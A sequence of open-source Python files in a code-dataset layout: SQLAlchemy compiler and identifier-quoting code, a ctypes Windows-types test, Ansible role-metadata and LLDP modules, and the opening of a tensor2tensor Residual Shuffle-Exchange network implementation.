else "%s_0" % _col_bind_name(c)
)
else:
if isinstance(value, elements.BindParameter) and \
value.type._isnull:
value = value._clone()
value.type = c.type
if c.primary_key and implicit_returning:
self.returning.append(c)
value = self.process(value.self_group(), **kw)
elif implicit_return_defaults and \
c in implicit_return_defaults:
self.returning.append(c)
value = self.process(value.self_group(), **kw)
else:
self.postfetch.append(c)
value = self.process(value.self_group(), **kw)
values.append((c, value))
elif self.isinsert:
if c.primary_key and \
need_pks and \
(
implicit_returning or
not postfetch_lastrowid or
c is not stmt.table._autoincrement_column
):
if implicit_returning:
if c.default is not None:
if c.default.is_sequence:
if self.dialect.supports_sequences and \
(not c.default.optional or \
not self.dialect.sequences_optional):
proc = self.process(c.default, **kw)
values.append((c, proc))
self.returning.append(c)
elif c.default.is_clause_element:
values.append(
(c,
self.process(c.default.arg.self_group(), **kw))
)
self.returning.append(c)
else:
values.append(
(c, self._create_crud_bind_param(c, None))
)
self.prefetch.append(c)
else:
self.returning.append(c)
else:
if (
c.default is not None and
(
not c.default.is_sequence or
self.dialect.supports_sequences
)
) or \
c is stmt.table._autoincrement_column and (
self.dialect.supports_sequences or
self.dialect.preexecute_autoincrement_sequences
):
values.append(
(c, self._create_crud_bind_param(c, None))
)
self.prefetch.append(c)
elif c.default is not None:
if c.default.is_sequence:
if self.dialect.supports_sequences and \
(not c.default.optional or \
not self.dialect.sequences_optional):
proc = self.process(c.default, **kw)
values.append((c, proc))
if implicit_return_defaults and \
c in implicit_return_defaults:
self.returning.append(c)
elif not c.primary_key:
self.postfetch.append(c)
elif c.default.is_clause_element:
values.append(
(c, self.process(c.default.arg.self_group(), **kw))
)
if implicit_return_defaults and \
c in implicit_return_defaults:
self.returning.append(c)
elif not c.primary_key:
# don't add primary key column to postfetch
self.postfetch.append(c)
else:
values.append(
(c, self._create_crud_bind_param(c, None))
)
self.prefetch.append(c)
elif c.server_default is not None:
if implicit_return_defaults and \
c in implicit_return_defaults:
self.returning.append(c)
elif not c.primary_key:
self.postfetch.append(c)
elif implicit_return_defaults and \
c in implicit_return_defaults:
self.returning.append(c)
elif self.isupdate:
if c.onupdate is not None and not c.onupdate.is_sequence:
if c.onupdate.is_clause_element:
values.append(
(c, self.process(c.onupdate.arg.self_group(), **kw))
)
if implicit_return_defaults and \
c in implicit_return_defaults:
self.returning.append(c)
else:
self.postfetch.append(c)
else:
values.append(
(c, self._create_crud_bind_param(c, None))
)
self.prefetch.append(c)
elif c.server_onupdate is not None:
if implicit_return_defaults and \
c in implicit_return_defaults:
self.returning.append(c)
else:
self.postfetch.append(c)
elif implicit_return_defaults and \
c in implicit_return_defaults:
self.returning.append(c)
if parameters and stmt_parameters:
check = set(parameters).intersection(
_column_as_key(k) for k in stmt.parameters
).difference(check_columns)
if check:
raise exc.CompileError(
"Unconsumed column names: %s" %
(", ".join("%s" % c for c in check))
)
if stmt._has_multi_parameters:
values_0 = values
values = [values]
values.extend(
[
(
c,
self._create_crud_bind_param(
c, row[c.key],
name="%s_%d" % (c.key, i + 1)
)
if c.key in row else param
)
for (c, param) in values_0
]
for i, row in enumerate(stmt.parameters[1:])
)
return values
def visit_delete(self, delete_stmt, **kw):
self.stack.append({'correlate_froms': set([delete_stmt.table]),
"iswrapper": False,
"asfrom_froms": set([delete_stmt.table])})
self.isdelete = True
text = "DELETE "
if delete_stmt._prefixes:
text += self._generate_prefixes(delete_stmt,
delete_stmt._prefixes, **kw)
text += "FROM "
table_text = delete_stmt.table._compiler_dispatch(self,
asfrom=True, iscrud=True)
if delete_stmt._hints:
dialect_hints = dict([
(table, hint_text)
for (table, dialect), hint_text in
delete_stmt._hints.items()
if dialect in ('*', self.dialect.name)
])
if delete_stmt.table in dialect_hints:
table_text = self.format_from_hint_text(
table_text,
delete_stmt.table,
dialect_hints[delete_stmt.table],
True
)
else:
dialect_hints = None
text += table_text
if delete_stmt._returning:
self.returning = delete_stmt._returning
if self.returning_precedes_values:
text += " " + self.returning_clause(
delete_stmt, delete_stmt._returning)
if delete_stmt._whereclause is not None:
text += " WHERE "
text += delete_stmt._whereclause._compiler_dispatch(self)
if self.returning and not self.returning_precedes_values:
text += " " + self.returning_clause(
delete_stmt, delete_stmt._returning)
self.stack.pop(-1)
return text
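# Usage sketch (hypothetical table): t.delete().where(t.c.id == 5) compiles
# roughly to "DELETE FROM users WHERE users.id = :id_1".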
def visit_savepoint(self, savepoint_stmt):
return "SAVEPOINT %s" % self.preparer.format_savepoint(savepoint_stmt)
def visit_rollback_to_savepoint(self, savepoint_stmt):
return "ROLLBACK TO SAVEPOINT %s" % \
self.preparer.format_savepoint(savepoint_stmt)
def visit_release_savepoint(self, savepoint_stmt):
return "RELEASE SAVEPOINT %s" % \
self.preparer.format_savepoint(savepoint_stmt)
class DDLCompiler(Compiled):
@util.memoized_property
def sql_compiler(self):
return self.dialect.statement_compiler(self.dialect, None)
@util.memoized_property
def type_compiler(self):
return self.dialect.type_compiler
@property
def preparer(self):
return self.dialect.identifier_preparer
def construct_params(self, params=None):
return None
def visit_ddl(self, ddl, **kwargs):
# table events can substitute table and schema name
context = ddl.context
if isinstance(ddl.target, schema.Table):
context = context.copy()
preparer = self.dialect.identifier_preparer
path = preparer.format_table_seq(ddl.target)
if len(path) == 1:
table, sch = path[0], ''
else:
table, sch = path[-1], path[0]
context.setdefault('table', table)
context.setdefault('schema', sch)
context.setdefault('fullname', preparer.format_table(ddl.target))
return self.sql_compiler.post_process_text(ddl.statement % context)
def visit_create_schema(self, create):
schema = self.preparer.format_schema(create.element)
return "CREATE SCHEMA " + schema
def visit_drop_schema(self, drop):
schema = self.preparer.format_schema(drop.element)
text = "DROP SCHEMA " + schema
if drop.cascade:
text += " CASCADE"
return text
def visit_create_table(self, create):
table = create.element
preparer = self.dialect.identifier_preparer
text = "\n" + " ".join(['CREATE'] + \
table._prefixes + \
['TABLE',
preparer.format_table(table),
"("])
separator = "\n"
# if only one primary key, specify it along with the column
first_pk = False
for create_column in create.columns:
column = create_column.element
try:
processed = self.process(create_column,
first_pk=column.primary_key
and not first_pk)
if processed is not None:
text += separator
separator = ", \n"
text += "\t" + processed
if column.primary_key:
first_pk = True
except exc.CompileError as ce:
util.raise_from_cause(
exc.CompileError(util.u("(in table '%s', column '%s'): %s") % (
table.description,
column.name,
ce.args[0]
)))
const = self.create_table_constraints(table)
if const:
text += ", \n\t" + const
text += "\n)%s\n\n" % self.post_create_table(table)
return text
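# Usage sketch (hypothetical metadata): CreateTable(t) for a table with an
# integer primary key "id" and a String(50) "name" emits roughly
# "CREATE TABLE users (id INTEGER NOT NULL, name VARCHAR(50), PRIMARY KEY (id))",
# laid out with the newline/tab separators produced above.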
def visit_create_column(self, create, first_pk=False):
column = create.element
if column.system:
return None
text = self.get_column_specification(
column,
first_pk=first_pk
)
const = " ".join(self.process(constraint) \
for constraint in column.constraints)
if const:
text += " " + const
return text
def create_table_constraints(self, table):
# On some databases the order is significant: visit the PK first, then the
# other constraints (engine.ReflectionTest.testbasic failed on FB2)
constraints = []
if table.primary_key:
constraints.append(table.primary_key)
constraints.extend([c for c in table._sorted_constraints
if c is not table.primary_key])
return ", \n\t".join(p for p in
(self.process(constraint)
for constraint in constraints
if (
constraint._create_rule is None or
constraint._create_rule(self))
and (
not self.dialect.supports_alter or
not getattr(constraint, 'use_alter', False)
)) if p is not None
)
def visit_drop_table(self, drop):
return "\nDROP TABLE " + self.preparer.format_table(drop.element)
def visit_drop_view(self, drop):
return "\nDROP VIEW " + self.preparer.format_table(drop.element)
def _verify_index_table(self, index):
if index.table is None:
raise exc.CompileError("Index '%s' is not associated "
"with any table." % index.name)
def visit_create_index(self, create, include_schema=False,
include_table_schema=True):
index = create.element
self._verify_index_table(index)
preparer = self.preparer
text = "CREATE "
if index.unique:
text += "UNIQUE "
text += "INDEX %s ON %s (%s)" \
% (
self._prepared_index_name(index,
include_schema=include_schema),
preparer.format_table(index.table,
use_schema=include_table_schema),
', '.join(
self.sql_compiler.process(expr,
include_table=False, literal_binds=True) for
expr in index.expressions)
)
return text
def visit_drop_index(self, drop):
index = drop.element
return "\nDROP INDEX " + self._prepared_index_name(index,
include_schema=True)
def _prepared_index_name(self, index, include_schema=False):
if include_schema and index.table is not None and index.table.schema:
schema = index.table.schema
schema_name = self.preparer.quote_schema(schema)
else:
schema_name = None
ident = index.name
if isinstance(ident, elements._truncated_label):
max_ = self.dialect.max_index_name_length or \
self.dialect.max_identifier_length
if len(ident) > max_:
ident = ident[0:max_ - 8] + \
"_" + util.md5_hex(ident)[-4:]
else:
self.dialect.validate_identifier(ident)
index_name = self.preparer.quote(ident)
if schema_name:
index_name = schema_name + "." + index_name
return index_name
def visit_add_constraint(self, create):
return "ALTER TABLE %s ADD %s" % (
self.preparer.format_table(create.element.table),
self.process(create.element)
)
def visit_create_sequence(self, create):
text = "CREATE SEQUENCE %s" % \
self.preparer.format_sequence(create.element)
if create.element.increment is not None:
text += " INCREMENT BY %d" % create.element.increment
if create.element.start is not None:
text += " START WITH %d" % create.element.start
return text
def visit_drop_sequence(self, drop):
return "DROP SEQUENCE %s" % \
self.preparer.format_sequence(drop.element)
def visit_drop_constraint(self, drop):
return "ALTER TABLE %s DROP CONSTRAINT %s%s" % (
self.preparer.format_table(drop.element.table),
self.preparer.format_constraint(drop.element),
drop.cascade and " CASCADE" or ""
)
def get_column_specification(self, column, **kwargs):
colspec = self.preparer.format_column(column) + " " + \
self.dialect.type_compiler.process(column.type)
default = self.get_column_default_string(column)
if default is not None:
colspec += " DEFAULT " + default
if not column.nullable:
colspec += " NOT NULL"
return colspec
def post_create_table(self, table):
return ''
def get_column_default_string(self, column):
if isinstance(column.server_default, schema.DefaultClause):
if isinstance(column.server_default.arg, util.string_types):
return "'%s'" % column.server_default.arg
else:
return self.sql_compiler.process(column.server_default.arg)
else:
return None
def visit_check_constraint(self, constraint):
text = ""
if constraint.name is not None:
text += "CONSTRAINT %s " % \
self.preparer.format_constraint(constraint)
text += "CHECK (%s)" % self.sql_compiler.process(constraint.sqltext,
include_table=False,
literal_binds=True)
text += self.define_constraint_deferrability(constraint)
return text
def visit_column_check_constraint(self, constraint):
text = ""
if constraint.name is not None:
text += "CONSTRAINT %s " % \
self.preparer.format_constraint(constraint)
text += "CHECK (%s)" % constraint.sqltext
text += self.define_constraint_deferrability(constraint)
return text
def visit_primary_key_constraint(self, constraint):
if len(constraint) == 0:
return ''
text = ""
if constraint.name is not None:
text += "CONSTRAINT %s " % \
self.preparer.format_constraint(constraint)
text += "PRIMARY KEY "
text += "(%s)" % ', '.join(self.preparer.quote(c.name)
for c in constraint)
text += self.define_constraint_deferrability(constraint)
return text
def visit_foreign_key_constraint(self, constraint):
preparer = self.dialect.identifier_preparer
text = ""
if constraint.name is not None:
text += "CONSTRAINT %s " % \
preparer.format_constraint(constraint)
remote_table = list(constraint._elements.values())[0].column.table
text += "FOREIGN KEY(%s) REFERENCES %s (%s)" % (
', '.join(preparer.quote(f.parent.name)
for f in constraint._elements.values()),
self.define_constraint_remote_table(
constraint, remote_table, preparer),
', '.join(preparer.quote(f.column.name)
for f in constraint._elements.values())
)
text += self.define_constraint_match(constraint)
text += self.define_constraint_cascades(constraint)
text += self.define_constraint_deferrability(constraint)
return text
def define_constraint_remote_table(self, constraint, table, preparer):
"""Format the remote table clause of a CREATE CONSTRAINT clause."""
return preparer.format_table(table)
def visit_unique_constraint(self, constraint):
if len(constraint) == 0:
return ''
text = ""
if constraint.name is not None:
text += "CONSTRAINT %s " % \
self.preparer.format_constraint(constraint)
text += "UNIQUE (%s)" % (
', '.join(self.preparer.quote(c.name)
for c in constraint))
text += self.define_constraint_deferrability(constraint)
return text
def define_constraint_cascades(self, constraint):
text = ""
if constraint.ondelete is not None:
text += " ON DELETE %s" % constraint.ondelete
if constraint.onupdate is not None:
text += " ON UPDATE %s" % constraint.onupdate
return text
def define_constraint_deferrability(self, constraint):
text = ""
if constraint.deferrable is not None:
if constraint.deferrable:
text += " DEFERRABLE"
else:
text += " NOT DEFERRABLE"
if constraint.initially is not None:
text += " INITIALLY %s" % constraint.initially
return text
def define_constraint_match(self, constraint):
text = ""
if constraint.match is not None:
text += " MATCH %s" % constraint.match
return text
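# Illustrative usage sketch (added; not part of the original SQLAlchemy source): the
# visit_* DDL methods above are normally exercised indirectly by compiling a
# CreateTable construct against a dialect/engine, roughly like this:
#
#   from sqlalchemy import Table, Column, Integer, String, MetaData, create_engine
#   from sqlalchemy.schema import CreateTable
#   metadata = MetaData()
#   users = Table("users", metadata,
#                 Column("id", Integer, primary_key=True),
#                 Column("name", String(50), nullable=False))
#   print(CreateTable(users).compile(bind=create_engine("sqlite://")))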
class GenericTypeCompiler(TypeCompiler):
def visit_FLOAT(self, type_):
return "FLOAT"
def visit_REAL(self, type_):
return "REAL"
def visit_NUMERIC(self, type_):
if type_.precision is None:
return "NUMERIC"
elif type_.scale is None:
return "NUMERIC(%(precision)s)" % \
{'precision': type_.precision}
else:
return "NUMERIC(%(precision)s, %(scale)s)" % \
{'precision': type_.precision,
'scale': type_.scale}
def visit_DECIMAL(self, type_):
if type_.precision is None:
return "DECIMAL"
elif type_.scale is None:
return "DECIMAL(%(precision)s)" % \
{'precision': type_.precision}
else:
return "DECIMAL(%(precision)s, %(scale)s)" % \
{'precision': type_.precision,
'scale': type_.scale}
def visit_INTEGER(self, type_):
return "INTEGER"
def visit_SMALLINT(self, type_):
return "SMALLINT"
def visit_BIGINT(self, type_):
return "BIGINT"
def visit_TIMESTAMP(self, type_):
return 'TIMESTAMP'
def visit_DATETIME(self, type_):
return "DATETIME"
def visit_DATE(self, type_):
return "DATE"
def visit_TIME(self, type_):
return "TIME"
def visit_CLOB(self, type_):
return "CLOB"
def visit_NCLOB(self, type_):
return "NCLOB"
def _render_string_type(self, type_, name):
text = name
if type_.length:
text += "(%d)" % type_.length
if type_.collation:
text += ' COLLATE "%s"' % type_.collation
return text
def visit_CHAR(self, type_):
return self._render_string_type(type_, "CHAR")
def visit_NCHAR(self, type_):
return self._render_string_type(type_, "NCHAR")
def visit_VARCHAR(self, type_):
return self._render_string_type(type_, "VARCHAR")
def visit_NVARCHAR(self, type_):
return self._render_string_type(type_, "NVARCHAR")
def visit_TEXT(self, type_):
return self._render_string_type(type_, "TEXT")
def visit_BLOB(self, type_):
return "BLOB"
def visit_BINARY(self, type_):
return "BINARY" + (type_.length and "(%d)" % type_.length or "")
def visit_VARBINARY(self, type_):
return "VARBINARY" + (type_.length and "(%d)" % type_.length or "")
def visit_BOOLEAN(self, type_):
return "BOOLEAN"
def visit_large_binary(self, type_):
return self.visit_BLOB(type_)
def visit_boolean(self, type_):
return self.visit_BOOLEAN(type_)
def visit_time(self, type_):
return self.visit_TIME(type_)
def visit_datetime(self, type_):
return self.visit_DATETIME(type_)
def visit_date(self, type_):
return self.visit_DATE(type_)
def visit_big_integer(self, type_):
return self.visit_BIGINT(type_)
def visit_small_integer(self, type_):
return self.visit_SMALLINT(type_)
def visit_integer(self, type_):
return self.visit_INTEGER(type_)
def visit_real(self, type_):
return self.visit_REAL(type_)
def visit_float(self, type_):
return self.visit_FLOAT(type_)
def visit_numeric(self, type_):
return self.visit_NUMERIC(type_)
def visit_string(self, type_):
return self.visit_VARCHAR(type_)
def visit_unicode(self, type_):
return self.visit_VARCHAR(type_)
def visit_text(self, type_):
return self.visit_TEXT(type_)
def visit_unicode_text(self, type_):
return self.visit_TEXT(type_)
def visit_enum(self, type_):
return self.visit_VARCHAR(type_)
def visit_null(self, type_):
raise exc.CompileError("Can't generate DDL for %r; "
"did you forget to specify a "
"type on this Column?" % type_)
def visit_type_decorator(self, type_):
return self.process(type_.type_engine(self.dialect))
def visit_user_defined(self, type_):
return type_.get_col_spec()
class IdentifierPreparer(object):
"""Handle quoting and case-folding of identifiers based on options."""
reserved_words = RESERVED_WORDS
legal_characters = LEGAL_CHARACTERS
illegal_initial_characters = ILLEGAL_INITIAL_CHARACTERS
def __init__(self, dialect, initial_quote='"',
final_quote=None, escape_quote='"', omit_schema=False):
"""Construct a new ``IdentifierPreparer`` object.
initial_quote
Character that begins a delimited identifier.
final_quote
Character that ends a delimited identifier. Defaults to
`initial_quote`.
omit_schema
Prevent prepending schema name. Useful for databases that do
          not support schemas.
"""
self.dialect = dialect
self.initial_quote = initial_quote
self.final_quote = final_quote or self.initial_quote
self.escape_quote = escape_quote
self.escape_to_quote = self.escape_quote * 2
self.omit_schema = omit_schema
self._strings = {}
def _escape_identifier(self, value):
"""Escape an identifier.
Subclasses should override this to provide database-dependent
escaping behavior.
"""
return value.replace(self.escape_quote, self.escape_to_quote)
def _unescape_identifier(self, value):
"""Canonicalize an escaped identifier.
Subclasses should override this to provide database-dependent
unescaping behavior that reverses _escape_identifier.
"""
return value.replace(self.escape_to_quote, self.escape_quote)
def quote_identifier(self, value):
"""Quote an identifier.
Subclasses should override this to provide database-dependent
quoting behavior.
"""
return self.initial_quote + \
self._escape_identifier(value) + \
self.final_quote
def _requires_quotes(self, value):
"""Return True if the given identifier requires quoting."""
lc_value = value.lower()
return (lc_value in self.reserved_words
or value[0] in self.illegal_initial_characters
or not self.legal_characters.match(util.text_type(value))
or (lc_value != value))
def quote_schema(self, schema, force=None):
"""Conditionally quote a schema.
Subclasses can override this to provide database-dependent
quoting behavior for schema names.
the 'force' flag should be considered deprecated.
"""
return self.quote(schema, force)
def quote(self, ident, force=None):
"""Conditionally quote an identifier.
the 'force' flag should be considered deprecated.
"""
force = getattr(ident, "quote", None)
if force is None:
if ident in self._strings:
return self._strings[ident]
else:
if self._requires_quotes(ident):
self._strings[ident] = self.quote_identifier(ident)
else:
self._strings[ident] = ident
return self._strings[ident]
elif force:
return self.quote_identifier(ident)
else:
return ident
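    # Illustrative behaviour sketch (added comment): quote() only adds delimiters when
    # _requires_quotes() is true -- reserved words, illegal characters, or mixed case.
    # Assuming a stock dialect's preparer:
    #   preparer.quote("order")    ->  '"order"'    (reserved word, quoted)
    #   preparer.quote("MyTable")  ->  '"MyTable"'  (mixed case, quoted)
    #   preparer.quote("my_table") ->  'my_table'   (returned unquoted)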
def format_sequence(self, sequence, use_schema=True):
name = self.quote(sequence.name)
if not self.omit_schema and use_schema and sequence.schema is not None:
name = self.quote_schema(sequence.schema) + "." + name
return name
def format_label(self, label, name=None):
return self.quote(name or label.name)
def format_alias(self, alias, name=None):
return self.quote(name or alias.name)
def format_savepoint(self, savepoint, name=None):
return self.quote(name or savepoint.ident)
def format_constraint(self, constraint):
return self.quote(constraint.name)
def format_table(self, table, use_schema=True, name=None):
"""Prepare a quoted table and schema name."""
if name is None:
name = table.name
result = self.quote(name)
if not self.omit_schema and use_schema \
and getattr(table, "schema", None):
result = self.quote_schema(table.schema) + "." + result
return result
def format_schema(self, name, quote=None):
"""Prepare a quoted schema name."""
return self.quote(name, quote)
def format_column(self, column, use_table=False,
name=None, table_name=None):
"""Prepare a quoted column name."""
if name is None:
name = column.name
if not getattr(column, 'is_literal', False):
if use_table:
return self.format_table(
column.table, use_schema=False,
name=table_name) + "." + self.quote(name)
else:
return self.quote(name)
else:
# literal textual elements get stuck into ColumnClause a lot,
# which shouldn't get quoted
if use_table:
return self.format_table(column.table,
use_schema=False, name=table_name) + '.' + name
else:
return name
def format_table_seq(self, table, use_schema=True):
"""Format table name and schema as a tuple."""
# Dialects with more levels in their fully qualified references
# ('database', 'owner', etc.) could override this and return
# a longer sequence.
if not self.omit_schema and use_schema and \
getattr(table, 'schema', None):
return (self.quote_schema(table.schema),
self.format_table(table, use_schema=False))
else:
return (self.format_table(table, use_schema=False), )
@util.memoized_property
def _r_identifiers(self):
initial, final, escaped_final = \
[re.escape(s) for s in
(self.initial_quote, self.final_quote,
self._escape_identifier(self.final_quote))]
r = re.compile(
r'(?:'
r'(?:%(initial)s((?:%(escaped)s|[^%(final)s])+)%(final)s'
r'|([^\.]+))(?=\.|$))+' %
{'initial': initial,
'final': final,
'escaped': escaped_final})
return r
def unformat_identifiers(self, identifiers):
"""Unpack 'schema.table.column'-like strings into components."""
r = self._r_identifiers
return [self._unescape_identifier(i)
for i in [a or b for a, b in r.findall(identifiers)]]
| mit |
FireWRT/OpenWrt-Firefly-Libraries | staging_dir/host/lib/python2.7/ctypes/test/test_wintypes.py | 134 | 1466 | import sys
import unittest
from ctypes import *
@unittest.skipUnless(sys.platform.startswith('win'), 'Windows-only test')
class WinTypesTest(unittest.TestCase):
def test_variant_bool(self):
from ctypes import wintypes
# reads 16-bits from memory, anything non-zero is True
for true_value in (1, 32767, 32768, 65535, 65537):
true = POINTER(c_int16)(c_int16(true_value))
value = cast(true, POINTER(wintypes.VARIANT_BOOL))
self.assertEqual(repr(value.contents), 'VARIANT_BOOL(True)')
vb = wintypes.VARIANT_BOOL()
self.assertIs(vb.value, False)
vb.value = True
self.assertIs(vb.value, True)
vb.value = true_value
self.assertIs(vb.value, True)
for false_value in (0, 65536, 262144, 2**33):
false = POINTER(c_int16)(c_int16(false_value))
value = cast(false, POINTER(wintypes.VARIANT_BOOL))
self.assertEqual(repr(value.contents), 'VARIANT_BOOL(False)')
# allow any bool conversion on assignment to value
for set_value in (65536, 262144, 2**33):
vb = wintypes.VARIANT_BOOL()
vb.value = set_value
self.assertIs(vb.value, True)
vb = wintypes.VARIANT_BOOL()
vb.value = [2, 3]
self.assertIs(vb.value, True)
vb.value = []
self.assertIs(vb.value, False)
if __name__ == "__main__":
unittest.main()
| gpl-2.0 |
goozbach/ansible | lib/ansible/playbook/role/metadata.py | 64 | 3373 | # (c) 2014 Michael DeHaan, <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from ansible.compat.six import iteritems, string_types
from ansible.errors import AnsibleParserError
from ansible.playbook.attribute import Attribute, FieldAttribute
from ansible.playbook.base import Base
from ansible.playbook.helpers import load_list_of_roles
from ansible.playbook.role.include import RoleInclude
__all__ = ['RoleMetadata']
class RoleMetadata(Base):
'''
This class wraps the parsing and validation of the optional metadata
within each Role (meta/main.yml).
'''
_allow_duplicates = FieldAttribute(isa='bool', default=False)
_dependencies = FieldAttribute(isa='list', default=[])
_galaxy_info = FieldAttribute(isa='GalaxyInfo')
def __init__(self, owner=None):
self._owner = owner
super(RoleMetadata, self).__init__()
@staticmethod
def load(data, owner, variable_manager=None, loader=None):
'''
Returns a new RoleMetadata object based on the datastructure passed in.
'''
if not isinstance(data, dict):
raise AnsibleParserError("the 'meta/main.yml' for role %s is not a dictionary" % owner.get_name())
m = RoleMetadata(owner=owner).load_data(data, variable_manager=variable_manager, loader=loader)
return m
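    # Illustrative sketch (added comment; hypothetical values): `data` is the parsed
    # contents of a role's meta/main.yml, for example:
    #   data = {'allow_duplicates': False, 'dependencies': [{'role': 'common'}]}
    #   meta = RoleMetadata.load(data, owner=my_role, variable_manager=vm, loader=loader)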
def _load_dependencies(self, attr, ds):
'''
This is a helper loading function for the dependencies list,
which returns a list of RoleInclude objects
'''
if ds is None:
ds = []
current_role_path = None
if self._owner:
current_role_path = os.path.dirname(self._owner._role_path)
try:
return load_list_of_roles(ds, play=self._owner._play, current_role_path=current_role_path, variable_manager=self._variable_manager, loader=self._loader)
except AssertionError:
raise AnsibleParserError("A malformed list of role dependencies was encountered.", obj=self._ds)
def _load_galaxy_info(self, attr, ds):
'''
This is a helper loading function for the galaxy info entry
in the metadata, which returns a GalaxyInfo object rather than
a simple dictionary.
'''
return ds
def serialize(self):
return dict(
allow_duplicates = self._allow_duplicates,
dependencies = self._dependencies,
)
def deserialize(self, data):
setattr(self, 'allow_duplicates', data.get('allow_duplicates', False))
setattr(self, 'dependencies', data.get('dependencies', []))
| gpl-3.0 |
dharmabumstead/ansible | lib/ansible/modules/net_tools/lldp.py | 103 | 2499 | #!/usr/bin/python
#
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: lldp
requirements: [ lldpctl ]
version_added: 1.6
short_description: get details reported by lldp
description:
- Reads data out of lldpctl
options: {}
author: "Andy Hill (@andyhky)"
notes:
- Requires lldpd running and lldp enabled on switches
'''
EXAMPLES = '''
# Retrieve switch/port information
- name: Gather information from lldp
lldp:
- name: Print each switch/port
debug:
msg: "{{ lldp[item]['chassis']['name'] }} / {{ lldp[item]['port']['ifname'] }}"
with_items: "{{ lldp.keys() }}"
# TASK: [Print each switch/port] ***********************************************************
# ok: [10.13.0.22] => (item=eth2) => {"item": "eth2", "msg": "switch1.example.com / Gi0/24"}
# ok: [10.13.0.22] => (item=eth1) => {"item": "eth1", "msg": "switch2.example.com / Gi0/3"}
# ok: [10.13.0.22] => (item=eth0) => {"item": "eth0", "msg": "switch3.example.com / Gi0/3"}
'''
from ansible.module_utils.basic import AnsibleModule
def gather_lldp(module):
cmd = ['lldpctl', '-f', 'keyvalue']
rc, output, err = module.run_command(cmd)
if output:
output_dict = {}
current_dict = {}
lldp_entries = output.split("\n")
for entry in lldp_entries:
if entry.startswith('lldp'):
path, value = entry.strip().split("=", 1)
path = path.split(".")
path_components, final = path[:-1], path[-1]
else:
value = current_dict[final] + '\n' + entry
current_dict = output_dict
for path_component in path_components:
current_dict[path_component] = current_dict.get(path_component, {})
current_dict = current_dict[path_component]
current_dict[final] = value
return output_dict
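# Illustrative sketch (added comment; hypothetical values) of the `lldpctl -f keyvalue`
# output that gather_lldp() parses:
#   lldp.eth0.chassis.name=switch1.example.com
#   lldp.eth0.port.ifname=Gi0/24
# Each line is split on "=", the dotted path becomes nested dictionary keys, and the
# final component holds the value, yielding e.g.
#   {'eth0': {'chassis': {'name': 'switch1.example.com'}, 'port': {'ifname': 'Gi0/24'}}}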
def main():
module = AnsibleModule({})
lldp_output = gather_lldp(module)
try:
data = {'lldp': lldp_output['lldp']}
module.exit_json(ansible_facts=data)
except TypeError:
module.fail_json(msg="lldpctl command failed. is lldpd running?")
if __name__ == '__main__':
main()
| gpl-3.0 |
tensorflow/tensor2tensor | tensor2tensor/models/research/residual_shuffle_exchange.py | 1 | 8731 | # coding=utf-8
# Copyright 2021 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Residual Shuffle-Exchange Network.
Implementation of
"Residual Shuffle-Exchange Networks for Fast Processing of Long Sequences"
paper by A.Draguns, E.Ozolins, A.Sostaks, M.Apinis, K.Freivalds.
Paper: https://arxiv.org/abs/2004.04662
Original code: https://github.com/LUMII-Syslab/RSE
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensor2tensor.layers.common_layers import gelu
from tensor2tensor.models.research.shuffle_network import reverse_shuffle_layer
from tensor2tensor.models.research.shuffle_network import shuffle_layer
from tensor2tensor.models.research.shuffle_network import ShuffleNetwork
from tensor2tensor.utils import registry
import tensorflow.compat.v1 as tf
class LayerNormalization(tf.keras.layers.Layer):
"""Layer Normalization (LayerNorm) without output bias and gain."""
def __init__(self, axis=1, epsilon=1e-10, **kwargs):
"""Initialize Layer Normalization layer.
Args:
      axis: Axis or tuple of axes over which the mean and variance are calculated
epsilon: Small epsilon to avoid division by zero
**kwargs: keyword args passed to super.
"""
self.axis = axis
self.epsilon = epsilon
self.bias = None
super(LayerNormalization, self).__init__(**kwargs)
def build(self, input_shape):
"""Initialize bias weights for layer normalization.
Args:
input_shape: shape of input tensor
"""
num_units = input_shape.as_list()[-1]
self.bias = self.add_weight(
"bias", [1, 1, num_units], initializer=tf.zeros_initializer)
super(LayerNormalization, self).build(input_shape)
def call(self, inputs, **kwargs):
"""Apply Layer Normalization without output bias and gain.
Args:
inputs: tensor to be normalized. Axis should be smaller than input tensor
dimensions.
**kwargs: more arguments (unused)
Returns:
tensor output.
"""
inputs -= tf.reduce_mean(inputs, axis=self.axis, keepdims=True)
inputs += self.bias
variance = tf.reduce_mean(tf.square(inputs), self.axis, keepdims=True)
return inputs * tf.math.rsqrt(variance + self.epsilon)
def inv_sigmoid(y):
"""Inverse sigmoid function.
Args:
y: float in range 0 to 1
Returns:
the inverse sigmoid.
"""
return np.log(y / (1 - y))
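# Note (added comment): inv_sigmoid is the logit function; RSU below uses it to
# initialize residual_scale so that sigmoid(residual_scale) starts at
# residual_weight (0.9), i.e. the residual path initially dominates the update.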
class RSU(tf.keras.layers.Layer):
"""Residual Switch Unit of Residual Shuffle-Exchange network."""
def __init__(self, prefix, dropout, mode, **kwargs):
"""Initialize Switch Layer.
Args:
prefix: Name prefix for switch layer
dropout: Dropout rate
mode: Training mode
**kwargs: more arguments (unused)
"""
super().__init__(**kwargs)
self.prefix = prefix
self.dropout = dropout
self.mode = mode
self.first_linear = None
self.second_linear = None
self.layer_norm = None
self.residual_scale = None
residual_weight = 0.9
self.candidate_weight = np.sqrt(1 - residual_weight**2) * 0.25
